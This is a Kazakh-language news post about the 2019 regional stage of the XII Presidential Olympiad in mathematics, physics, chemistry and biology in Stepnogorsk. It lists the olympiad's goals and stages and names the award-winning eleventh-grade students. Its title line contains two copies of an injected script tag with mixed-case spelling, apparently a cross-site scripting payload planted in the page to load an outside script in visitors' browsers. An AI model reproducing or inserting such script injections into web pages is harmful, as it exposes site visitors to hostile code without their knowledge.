Жаратылыстану-математикалық бағыттағы пәндер бойынша XII Президенттік олимпиаданың облыстық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.09.2019

2019 жылдың 25-26 қыркүйегінде«Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған «Болашақ» мектеп-интернаты» КММ базасында жаратылыстану-математикалық бағыттағы пәндер бойынша XII Президенттік олимпиаданың облыстық кезеңі өткізілді.

Президенттік олимпиаданың мақсаты мен міндеттері:

- орта білім беру ұйымдарының оқушылары арасында математика, физика, химия және биологиядан дарынды оқушыларды анықтау үшін кәсіптік бағдар мен болашақтағы интеллектуалдық дамуына қолайлы жағдай жасау;

- жаратылыстану-математикалық бағыттағы пәндерді оқытуда оқушылардың қызығушылығын арттыру, теориялық білімдері мен дағдыларын тереңдету;

- тұлғаның өзін-өзі жетілдіруіне және дамытуына жағдай жасау.

Президенттік олимпиаданың облыстық кезеңіне  Көкшетау, Степногорск қалаларынан, аудандық білім беру ұйымдарынан 80 оқушы бақтарын сынады.

Конкурс үш кезеңнен тұрды:

  • бірінші кезең − өңірлік кезең;
  • екінші кезең − іріктеу кезеңі 2 турдан тұрады:

1) қашықтық;

2) шығармашылық эссе жазу (1 беттен кем емес);

  • үшінші кезең − республикалық кезең.

Президенттік олимпиадаға білім беру ұйымдарының техникалық мамандықтарға икемі бар және жаратылыстану-математикалық бағыттағы пәндерге қызығушылық танытқан 11 сынып оқушылары қатысты.

Президенттік олимпиаданың әр қатысушысы барлық кезеңде тапсырмаларды төрт пәннен орындайды: математика, физика, химия, биология.

Президенттік олимпиаданың облыстық кезеңінің жүлдегерлері І, ІІ, ІІІ дәрежелі дипломдармен келесі оқушылар марапатталды:

  1. Ақмола облысы білім басқармасының І дәрежелі дипломымен биология пәні бойынша Көкшетау қаласы, гуманитарлық-техникалық лицей-мектебінің 11 сынып оқушысы - Хохлов Владислав;
  2. Ақмола облысы білім басқармасының І дәрежелі дипломымен химия пәні бойынша №3 дарынды балаларға арналған мектеп-интернатының 11 сынып оқушысы – Жакиянова Камилла;
  3. Математика пәнінен І дәрежелі дипломмен Степногорск қаласы, дарынды балаларға арналған №4 «Болашақ» облыстық мамандандырылған мектеп-интернатының  11 сынып оқушысы - Өндіріс Диас   марапатталады;
  4. Биология пәні бойынша  ІІ дәржелі дипломмен Ерейменту ауданы, Н.Смағұлов атындағы №2 орта мектебінің 11 сынып оқушысы – Куатова Венера;
  5. Математика пәнінен ІІ дәрежелі дипломмен Аршалы ауданы, Абай  атындағы Аршалы орта мектебінің 11 сынып оқушысы -Адал Сандуғаш марапатталады;
  6. Биология пәнінен ІІІ дәрежелі дипломмен «Білім-инновация» лицей-интернатының 11 сынып оқушысы – Киззатов Айдын;
  7. Биология пәнінен бойынша ІІІ дәрежелі дипломмен Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының  11 сынып оқушысы - Думанбек Шынар;
  8. Математика пәнінен ІІІ дәрежелі дипломмен Астрахан ауданы, №2 Жалтыр орта мектебінің 11 сынып оқушысы - Ныгмет Рустем.

Жаратылыстану-математикалық бағыттағы XII Президенттік олимпиаданың облыстық кезеңінде математика,  физика, химия,  биология пәндерінің жалпы есебі бойынша келесі оқушылар марапатталды:

  1. Ақмола облысы білім басқармасының І дәрежелі дипломымен Сандықтау ауданы, Новоникольск орта мектебінің 11 сынып оқушысы - Калиакпарова Ильмира марапатталады;
  2. ІІ дәрежелі дипломмен Көкшетау қ. ІТ лицейінің 11 сынып оқушысы - Садвакасова Жаннур;
  3. ІІ дәрежелі дипломмен Ерейментау ауданы, Еркіншілік орта мектебінің 11 сынып оқушысы - Даулет Балжан марапатталады;
  4. ІІІ дәрежелі дипломмен дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы – Сапаргалиева Томирис;
  5. ІІІ дәрежелі дипломмен Бурабай ауданы, Щучье қаласының №1 мектеп-гимназиясының 11 сынып оқушысы - Яндиев Ибрагим;
  6. ІІІ дәрежелі дипломмен Бұланды ауданы, Макинск қаласының мектеп-гимназиясының 11 сынып оқушысы - Кенжебаева Фарида;
  7. ІІІ дәрежелі дипломмен Степногорск қаласы, дарынды балаларға арналған №4 «Болашақ» облыстық мамандандырылған мектеп-интернатының  11 сынып оқушысы - Жалов Павел.

Грамоталармен келесі оқушылар марапатталды:

  1. Бұланды ауданы, Макинск қаласының мектеп-гимназиясының 11 сынып оқушысы - Цымбал Светлана; 
  2.   Көкшетау қаласы, №11 орта мектебінің 11 сынып оқушысы - Колесник Екатерина;
  3. ауданы, Айдабол орта мектебінің 11 сынып оқушысы - Яндуткина Карина;
  4. Астрахан ауданы, №4 Жалтыр  орта мектебінің 11 сынып оқушысы - Пунтас Виктория;
  5. Нұр–Сұлтан қ., облыстық дарынды балаларға арналған мамандандырылған мектеп-интернатының 11 сынып оқушысы -Асанхожа Нұр-Мұхаммед.
Просмотров: 642


Пікір қосу



Деректерді қолтаңбаға қосу